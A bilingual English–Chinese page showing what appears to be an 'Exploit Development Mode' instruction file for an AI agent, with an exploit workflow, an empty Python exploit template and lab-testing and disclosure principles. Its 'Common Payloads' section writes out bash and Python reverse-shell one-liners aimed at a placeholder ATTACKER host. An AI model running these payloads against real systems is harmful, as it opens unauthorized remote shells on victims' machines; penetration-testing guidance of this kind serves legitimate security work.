Back to Details

mode-exploit

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Exploit Development Mode

漏洞利用开发模式

Workflow

工作流

  1. Analyze → Understand vulnerability, root cause
  2. Research → Find similar exploits, CVEs, techniques
  3. Develop → Write exploit code
  4. Test → Verify in controlled environment
  5. Document → PoC, usage instructions, impact
  1. 分析 → 理解漏洞及根本原因
  2. 调研 → 查找类似漏洞利用程序、CVE漏洞编号、相关技术
  3. 开发 → 编写漏洞利用代码
  4. 测试 → 在受控环境中验证
  5. 文档记录 → 撰写概念验证代码(PoC)、使用说明、影响分析

Exploit Template (Python)

漏洞利用模板(Python)

python
#!/usr/bin/env python3
"""
Exploit: [CVE-XXXX-XXXX / Vuln Name]
Target: [Software/Version]
Type: [RCE/SQLi/LFI/etc]
Author: [Name]
"""

import argparse
import requests

def exploit(target: str, cmd: str = "id") -> str:
    """Main exploit logic"""
    # Exploit code here
    pass

def main():
    parser = argparse.ArgumentParser(description="Exploit description")
    parser.add_argument("target", help="Target URL/IP")
    parser.add_argument("-c", "--cmd", default="id", help="Command to execute")
    args = parser.parse_args()
    
    result = exploit(args.target, args.cmd)
    print(result)

if __name__ == "__main__":
    main()
python
#!/usr/bin/env python3
"""
Exploit: [CVE-XXXX-XXXX / Vuln Name]
Target: [Software/Version]
Type: [RCE/SQLi/LFI/etc]
Author: [Name]
"""

import argparse
import requests

def exploit(target: str, cmd: str = "id") -> str:
    """Main exploit logic"""
    # Exploit code here
    pass

def main():
    parser = argparse.ArgumentParser(description="Exploit description")
    parser.add_argument("target", help="Target URL/IP")
    parser.add_argument("-c", "--cmd", default="id", help="Command to execute")
    args = parser.parse_args()
    
    result = exploit(args.target, args.cmd)
    print(result)

if __name__ == "__main__":
    main()

Common Payloads

常见载荷

bash
undefined
bash
undefined

Reverse shell (bash)

Reverse shell (bash)

bash -i >& /dev/tcp/ATTACKER/PORT 0>&1
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1

Python reverse shell

Python reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
undefined
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
undefined

Principles

原则

  • Test in lab environment first
  • Document all steps clearly
  • Include cleanup/restore steps
  • Follow responsible disclosure
  • 先在实验室环境中测试
  • 清晰记录所有步骤
  • 包含清理/恢复步骤
  • 遵循负责任披露原则